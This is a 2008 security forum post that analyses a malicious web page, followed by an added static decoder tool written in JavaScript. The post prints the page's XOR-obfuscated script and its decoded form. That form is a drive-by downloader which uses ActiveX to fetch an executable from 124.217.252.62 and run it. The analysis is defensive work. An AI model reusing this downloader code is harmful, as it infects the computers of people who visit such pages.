Author Topic: 124.217.252.62  (Read 5555 times)

July 10, 2008, 01:56:43 am

MysteryFCM

Ref:
http://spywarewarrior.com/viewtopic.php?t=28654
http://www.spywarewarrior.com/viewtopic.php?p=184500

Code:
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://veryblomar.com/vb/in.cgi?2
Server IP: 124.217.252.57 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 09 July 2008
Time: 22:57:10:57
*****************************************************************
<html>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /index.php was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
</body></html><script language=JavaScript>str = "qnfo`mh)(: gtobuhno!qnfo`mh)(!z w`s!vldoeds!<!enbtldou/bsd`udDmdldou)&nckdbu&(: vldoeds/rdu@uushctud)&he&-&vldoeds&(: vldoeds/rdu@uushctud)&bm`rrhe&-&b&*&m&*#rhe;C#*#E8#*&7B447,74&*#@2,00#*&E1,892@,1&*#1B#*&15G&*#B38#*&D27&(: usx!z w`s!ppppp!<!vldoeds/Bsd`udNckdbu)&l&*#ry#*&lm3&*#/#*&Y&*#LM#*&I&*&UUQ&-&&(: w`s!vvvvv!<!vldoeds/Bsd`udNckdbu)#Ri#*#dmm/@#*#q#*#qmhb`#*#uhno#-&&(: w`s!ddddd!<!vldoeds/Bsd`udNckdbu)&`&*&e&*#nec/#*&ru&*#s#*&d`l&-&&(: usx!z!ddddd/uxqd!<!0: ppppp/nqdo)&F&*#D#*&U&-&iuuq;..035/306/343/73.{hcodvr.{hcodvr/bnl.yr.mn`e/qiq&-g`mrd(: ppppp/rdoe)(:!ddddd/nqdo)(: ddddd/Vshud)ppppp/sdrqnordCnex(: w`s!hlx`!<!&/..//..rbinrru/dyd&: ddddd/R`wdUnGhmd)hlx`-3(: ddddd/Bmnrd)(: |!b`ubi)d(!z| usx!z!vvvvv/ridmmdydbtud)hlx`(:!|!b`ubi)d(!z|| b`ubi)d(z||";str2 = "";for (i = 0; i < str.length; i ++) { str2 = str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);</script></html>

Decodes to:

Code:
pognali();
function pognali() {
var wmender = document.createElement('object');
wmender.setAttribute('id','wmender');
wmender.setAttribute('classid','c'+'l'+"sid:B"+"D9"+'6C556-65'+"A3-11"+'D0-983A-0'+"0C"+'04F'+"C29"+'E36');
try {
var qqqqq = wmender.CreateObject('m'+"sx"+'ml2'+"."+'X'+"ML"+'H'+'TTP','');
var wwwww = wmender.CreateObject("Sh"+"ell.A"+"p"+"plica"+"tion",'');
var eeeee = wmender.CreateObject('a'+'d'+"odb."+'st'+"r"+'eam','');
try { eeeee.type = 1;
qqqqq.open('G'+"E"+'T','http://124.217.252.62/~zibnews/zibnews.com/xs/load.php',false);
qqqqq.send(); eeeee.open();
eeeee.Write(qqqqq.responseBody);
var imya = './/..//schosst.exe';
eeeee.SaveToFile(imya,2);
eeeee.Close();
} catch(e) {}
try { wwwww.shellexecute(imya); } catch(e) {}}
catch(e){}}

124.217.252.62 = Est Domains

http://www.virustotal.com/analisis/411ea94ff318083af970ae3d5d6f48d2
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net
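
An added example (not part of the original post, and not vURL's code): a static JavaScript decoder for the XOR-and-eval wrapper shown in the post above, which recovers the script text plus its URL and CLSID without executing anything. The function names and the sample page, built around example.test and an all-zero CLSID, are constructed for illustration.

```javascript
// Static decoder for an XOR + eval() script wrapper; nothing is evaluated.

// XOR with a constant is its own inverse, so this both encodes and decodes.
function xorString(s, key) {
  return s.split('').map(c => String.fromCharCode(c.charCodeAt(0) ^ key)).join('');
}

// Pull the encoded literal and the XOR key out of the wrapper, then decode.
function unwrap(html) {
  const body = /str\s*=\s*"([^"]*)"/.exec(html);
  const key = /charCodeAt\s*\(\s*\w+\s*\)\s*\^\s*(\d+)/.exec(html);
  if (!body || !key) return null; // not this wrapper
  return xorString(body[1], Number(key[1]));
}

// Merge 'a'+"b" runs into one literal. Assumes literals without escapes or
// embedded quotes, which holds for this style of obfuscation.
function foldConcats(src) {
  const pair = /(['"])([^'"]*)\1\s*\+\s*(['"])([^'"]*)\3/g;
  let prev;
  do {
    prev = src;
    src = src.replace(pair, (m, q1, a, q2, b) => "'" + a + b + "'");
  } while (src !== prev);
  return src;
}

// Decode, fold, and list the indicators worth blocking or hunting for.
function analyze(html) {
  const decoded = unwrap(html);
  if (decoded === null) return null;
  const folded = foldConcats(decoded);
  return {
    folded,
    urls: folded.match(/https?:\/\/[^\s'"<>)]+/g) || [],
    clsids: folded.match(/clsid:[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}/gi) || [],
  };
}

// Constructed sample (placeholder host and all-zero CLSID), encoded with key 1.
const PLAIN = [
  `o.setAttribute('classid','c'+'l'+"sid:0000"+'0000-0000-0000-0000-0000'+"00000000");`,
  `x.open('G'+"E"+'T','http://example.test/sample/lo'+"ad.php",false);`,
].join('\n');
const SAMPLE_HTML = '<script>str = "' + xorString(PLAIN, 1) + '";str2 = "";for (i = 0; ' +
  'i < str.length; i ++) { str2 = str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; ' +
  'eval (str2);</script>';

console.log(analyze(SAMPLE_HTML));
```

Folding the split literals matters because a plain search for "clsid:" or "http://" over the decoded text misses values that are assembled from fragments.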

July 11, 2008, 10:11:15 pm
Reply #1

JohnC

Thank you.